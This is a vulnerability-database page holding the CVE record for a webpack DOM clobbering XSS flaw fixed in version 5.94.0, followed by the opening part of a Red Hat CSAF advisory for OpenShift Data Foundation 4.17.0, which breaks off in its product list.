cve-2024-43788
Vulnerability from cvelistv5
Published
2024-08-27 17:07
Modified
2024-09-03 14:51
Severity ?
EPSS score ?
Summary
DOM Clobbering Gadget found in Webpack's AutoPublicPathRuntimeModule that leads to Cross-site Scripting (XSS)
References
| ▼ | URL | Tags | |
|---|---|---|---|
| security-advisories@github.com | https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61 | Patch | |
| security-advisories@github.com | https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270 | ||
| security-advisories@github.com | https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986 | Exploit, Vendor Advisory | |
| security-advisories@github.com | https://research.securitum.com/xss-in-amp4email-dom-clobbering | Exploit, Third Party Advisory | |
| security-advisories@github.com | https://scnps.co/papers/sp23_domclob.pdf | Exploit, Mitigation, Technical Description, Third Party Advisory |
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:webpack:webpack:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "webpack",
"vendor": "webpack",
"versions": [
{
"lessThan": "5.94.0",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43788",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-27T18:09:32.950161Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-27T18:12:00.577Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "webpack",
"vendor": "webpack",
"versions": [
{
"status": "affected",
"version": "\u003e= 5.0.0-alpha.0, \u003c 5.94.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack\u2019s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-79",
"description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-09-03T14:51:39.140Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"name": "https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270"
},
{
"name": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"name": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"tags": [
"x_refsource_MISC"
],
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"name": "https://scnps.co/papers/sp23_domclob.pdf",
"tags": [
"x_refsource_MISC"
],
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"source": {
"advisory": "GHSA-4vvj-4cpr-p986",
"discovery": "UNKNOWN"
},
"title": "DOM Clobbering Gadget found in Webpack\u0027s AutoPublicPathRuntimeModule that leads to Cross-site Scripting (XSS)"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-43788",
"datePublished": "2024-08-27T17:07:16.285Z",
"dateReserved": "2024-08-16T14:20:37.323Z",
"dateUpdated": "2024-09-03T14:51:39.140Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"meta": {
"nvd": "{\"cve\":{\"id\":\"CVE-2024-43788\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-08-27T17:15:07.967\",\"lastModified\":\"2024-09-03T15:15:15.937\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack\u2019s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.\"},{\"lang\":\"es\",\"value\":\"Webpack es un paquete de m\u00f3dulos. Su objetivo principal es agrupar archivos JavaScript para su uso en un navegador, pero tambi\u00e9n es capaz de transformar, agrupar o empaquetar casi cualquier recurso o activo. Los desarrolladores del paquete web han descubierto una vulnerabilidad de DOM Clobbering en `AutoPublicPathRuntimeModule` de Webpack. El gadget DOM Clobbering en el m\u00f3dulo puede conducir a cross site scripting (XSS) en p\u00e1ginas web donde est\u00e1n presentes elementos HTML controlados por atacantes sin secuencias de comandos (por ejemplo, una etiqueta `img` con un atributo `name` no desinfectado). Se ha observado una explotaci\u00f3n de este dispositivo en el mundo real en Canvas LMS, lo que permite que se produzca un ataque XSS a trav\u00e9s de un c\u00f3digo javascript compilado por Webpack (la parte vulnerable es de Webpack). DOM Clobbering es un tipo de ataque de reutilizaci\u00f3n de c\u00f3digo en el que el atacante primero incrusta un fragmento de marcas HTML aparentemente benignas y sin script en la p\u00e1gina web (por ejemplo, a trav\u00e9s de una publicaci\u00f3n o comentario) y aprovecha los gadgets (fragmentos de c\u00f3digo js) que se encuentran en el c\u00f3digo javascript existente para transformarlo en c\u00f3digo ejecutable. Esta vulnerabilidad puede provocar cross site scripting (XSS) en sitios web que incluyen archivos generados por Webpack y permiten a los usuarios inyectar ciertas etiquetas HTML sin secuencias de comandos con nombres o atributos de identificaci\u00f3n desinfectados incorrectamente. Este problema se solucion\u00f3 en la versi\u00f3n 5.94.0. Se recomienda a todos los usuarios que actualicen. No se conocen workarounds para este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\",\"baseScore\":6.1,\"baseSeverity\":\"MEDIUM\"},\"exploitabilityScore\":2.8,\"impactScore\":2.7},{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"HIGH\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"LOW\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"HIGH\",\"baseScore\":6.4,\"baseSeverity\":\"MEDIUM\"},\"exploitabilityScore\":1.6,\"impactScore\":4.7}]},\"weaknesses\":[{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]},{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-79\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:webpack.js:webpack:*:*:*:*:*:node.js:*:*\",\"versionEndExcluding\":\"5.94.0\",\"matchCriteriaId\":\"10BD162E-912D-4458-A67B-F7BC3602FDC5\"}]}]}],\"references\":[{\"url\":\"https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://research.securitum.com/xss-in-amp4email-dom-clobbering\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://scnps.co/papers/sp23_domclob.pdf\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Mitigation\",\"Technical Description\",\"Third Party Advisory\"]}]}}"
}
}
rhsa-2024_8676
Vulnerability from csaf_redhat
Published
2024-10-30 14:25
Modified
2024-11-06 22:11
Summary
Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.0 Security, Enhancement, & Bug Fix Update
Notes
Topic
Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.
Details
Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multicloud data management service with an S3 compatible API.
These updated packages include numerous enhancements and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat OpenShift Data Foundation Release Notes for information on the most significant of these changes:
https://docs.redhat.com/en/documentation/red_hat_openshift_data_foundation/4.17/html/4.17_release_notes/index
All Red Hat OpenShift Data Foundation users are advised to upgrade to these packages that provide these bug fixes and enhancements.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Updated images that include numerous enhancements, security, and bug fixes are now available for Red Hat OpenShift Data Foundation 4.17.0 on Red Hat Enterprise Linux 9.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Data Foundation is software-defined storage integrated with and optimized for the Red Hat OpenShift Container Platform. Red Hat OpenShift Data Foundation is a highly scalable, production-grade persistent storage for stateful applications running in the Red Hat OpenShift Container Platform. In addition to persistent storage, Red Hat OpenShift Data Foundation provisions a multicloud data management service with an S3 compatible API.\n\nThese updated packages include numerous enhancements and bug fixes. Space precludes documenting all of these changes in this advisory. Users are directed to the Red Hat OpenShift Data Foundation Release Notes for information on the most significant of these changes:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_data_foundation/4.17/html/4.17_release_notes/index\n\nAll Red Hat OpenShift Data Foundation users are advised to upgrade to these packages that provide these bug fixes and enhancements.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:8676",
"url": "https://access.redhat.com/errata/RHSA-2024:8676"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2059669",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2059669"
},
{
"category": "external",
"summary": "2190161",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2190161"
},
{
"category": "external",
"summary": "2219310",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2219310"
},
{
"category": "external",
"summary": "2241329",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241329"
},
{
"category": "external",
"summary": "2245068",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2245068"
},
{
"category": "external",
"summary": "2250364",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2250364"
},
{
"category": "external",
"summary": "2253013",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2253013"
},
{
"category": "external",
"summary": "2257271",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2257271"
},
{
"category": "external",
"summary": "2259668",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2259668"
},
{
"category": "external",
"summary": "2262777",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262777"
},
{
"category": "external",
"summary": "2268046",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268046"
},
{
"category": "external",
"summary": "2268820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2268820"
},
{
"category": "external",
"summary": "2271773",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2271773"
},
{
"category": "external",
"summary": "2272597",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2272597"
},
{
"category": "external",
"summary": "2275225",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2275225"
},
{
"category": "external",
"summary": "2275965",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2275965"
},
{
"category": "external",
"summary": "2276393",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276393"
},
{
"category": "external",
"summary": "2276672",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2276672"
},
{
"category": "external",
"summary": "2279751",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279751"
},
{
"category": "external",
"summary": "2279876",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2279876"
},
{
"category": "external",
"summary": "2280308",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2280308"
},
{
"category": "external",
"summary": "2280608",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2280608"
},
{
"category": "external",
"summary": "2280637",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2280637"
},
{
"category": "external",
"summary": "2283994",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2283994"
},
{
"category": "external",
"summary": "2292435",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292435"
},
{
"category": "external",
"summary": "2292668",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2292668"
},
{
"category": "external",
"summary": "2294234",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294234"
},
{
"category": "external",
"summary": "2294723",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294723"
},
{
"category": "external",
"summary": "2297265",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297265"
},
{
"category": "external",
"summary": "2297295",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297295"
},
{
"category": "external",
"summary": "2297447",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297447"
},
{
"category": "external",
"summary": "2297454",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2297454"
},
{
"category": "external",
"summary": "2299630",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2299630"
},
{
"category": "external",
"summary": "2299639",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2299639"
},
{
"category": "external",
"summary": "2300021",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300021"
},
{
"category": "external",
"summary": "2300312",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300312"
},
{
"category": "external",
"summary": "2300331",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300331"
},
{
"category": "external",
"summary": "2300499",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2300499"
},
{
"category": "external",
"summary": "2301889",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301889"
},
{
"category": "external",
"summary": "2302201",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302201"
},
{
"category": "external",
"summary": "2302257",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302257"
},
{
"category": "external",
"summary": "2302448",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302448"
},
{
"category": "external",
"summary": "2302507",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302507"
},
{
"category": "external",
"summary": "2302575",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302575"
},
{
"category": "external",
"summary": "2302774",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302774"
},
{
"category": "external",
"summary": "2302841",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302841"
},
{
"category": "external",
"summary": "2302842",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2302842"
},
{
"category": "external",
"summary": "2303028",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303028"
},
{
"category": "external",
"summary": "2303342",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303342"
},
{
"category": "external",
"summary": "2303403",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303403"
},
{
"category": "external",
"summary": "2303619",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303619"
},
{
"category": "external",
"summary": "2303820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303820"
},
{
"category": "external",
"summary": "2303821",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303821"
},
{
"category": "external",
"summary": "2303822",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303822"
},
{
"category": "external",
"summary": "2303823",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303823"
},
{
"category": "external",
"summary": "2303824",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303824"
},
{
"category": "external",
"summary": "2303825",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303825"
},
{
"category": "external",
"summary": "2303829",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2303829"
},
{
"category": "external",
"summary": "2304073",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304073"
},
{
"category": "external",
"summary": "2304231",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304231"
},
{
"category": "external",
"summary": "2304232",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304232"
},
{
"category": "external",
"summary": "2304235",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304235"
},
{
"category": "external",
"summary": "2304238",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304238"
},
{
"category": "external",
"summary": "2304799",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304799"
},
{
"category": "external",
"summary": "2304810",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304810"
},
{
"category": "external",
"summary": "2304815",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304815"
},
{
"category": "external",
"summary": "2304993",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304993"
},
{
"category": "external",
"summary": "2305274",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305274"
},
{
"category": "external",
"summary": "2305295",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305295"
},
{
"category": "external",
"summary": "2305660",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305660"
},
{
"category": "external",
"summary": "2305880",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2305880"
},
{
"category": "external",
"summary": "2306026",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2306026"
},
{
"category": "external",
"summary": "2306387",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2306387"
},
{
"category": "external",
"summary": "2306577",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2306577"
},
{
"category": "external",
"summary": "2307823",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2307823"
},
{
"category": "external",
"summary": "2307835",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2307835"
},
{
"category": "external",
"summary": "2307909",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2307909"
},
{
"category": "external",
"summary": "2308091",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308091"
},
{
"category": "external",
"summary": "2308101",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308101"
},
{
"category": "external",
"summary": "2308144",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308144"
},
{
"category": "external",
"summary": "2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "2308304",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308304"
},
{
"category": "external",
"summary": "2308442",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308442"
},
{
"category": "external",
"summary": "2308446",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308446"
},
{
"category": "external",
"summary": "2309191",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309191"
},
{
"category": "external",
"summary": "2309195",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309195"
},
{
"category": "external",
"summary": "2309485",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309485"
},
{
"category": "external",
"summary": "2309486",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309486"
},
{
"category": "external",
"summary": "2309487",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309487"
},
{
"category": "external",
"summary": "2309488",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309488"
},
{
"category": "external",
"summary": "2309489",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309489"
},
{
"category": "external",
"summary": "2309700",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309700"
},
{
"category": "external",
"summary": "2310369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310369"
},
{
"category": "external",
"summary": "2310385",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310385"
},
{
"category": "external",
"summary": "2310841",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310841"
},
{
"category": "external",
"summary": "2310908",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2310908"
},
{
"category": "external",
"summary": "2311042",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311042"
},
{
"category": "external",
"summary": "2311043",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311043"
},
{
"category": "external",
"summary": "2311152",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311152"
},
{
"category": "external",
"summary": "2311153",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311153"
},
{
"category": "external",
"summary": "2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "2311171",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311171"
},
{
"category": "external",
"summary": "2311468",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311468"
},
{
"category": "external",
"summary": "2311551",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311551"
},
{
"category": "external",
"summary": "2311790",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311790"
},
{
"category": "external",
"summary": "2311867",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311867"
},
{
"category": "external",
"summary": "2311885",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311885"
},
{
"category": "external",
"summary": "2311893",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311893"
},
{
"category": "external",
"summary": "2312137",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312137"
},
{
"category": "external",
"summary": "2312442",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312442"
},
{
"category": "external",
"summary": "2313178",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313178"
},
{
"category": "external",
"summary": "2313203",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313203"
},
{
"category": "external",
"summary": "2313515",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313515"
},
{
"category": "external",
"summary": "2313717",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313717"
},
{
"category": "external",
"summary": "2313736",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313736"
},
{
"category": "external",
"summary": "2314200",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314200"
},
{
"category": "external",
"summary": "2314211",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314211"
},
{
"category": "external",
"summary": "2314404",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314404"
},
{
"category": "external",
"summary": "2314454",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314454"
},
{
"category": "external",
"summary": "2314636",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2314636"
},
{
"category": "external",
"summary": "2315624",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315624"
},
{
"category": "external",
"summary": "2315651",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315651"
},
{
"category": "external",
"summary": "2315666",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315666"
},
{
"category": "external",
"summary": "2315709",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315709"
},
{
"category": "external",
"summary": "2315733",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315733"
},
{
"category": "external",
"summary": "2315846",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2315846"
},
{
"category": "external",
"summary": "2318490",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318490"
},
{
"category": "external",
"summary": "2319102",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2319102"
},
{
"category": "external",
"summary": "2319238",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2319238"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8676.json"
}
],
"title": "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.0 Security, Enhancement, \u0026 Bug Fix Update",
"tracking": {
"current_release_date": "2024-11-06T22:11:40+00:00",
"generator": {
"date": "2024-11-06T22:11:40+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.1.1"
}
},
"id": "RHSA-2024:8676",
"initial_release_date": "2024-10-30T14:25:22+00:00",
"revision_history": [
{
"date": "2024-10-30T14:25:22+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-10-30T14:25:22+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-06T22:11:40+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "RHODF 4.17 for RHEL 9",
"product": {
"name": "RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_data_foundation:4.17::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Data Foundation"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"product": {
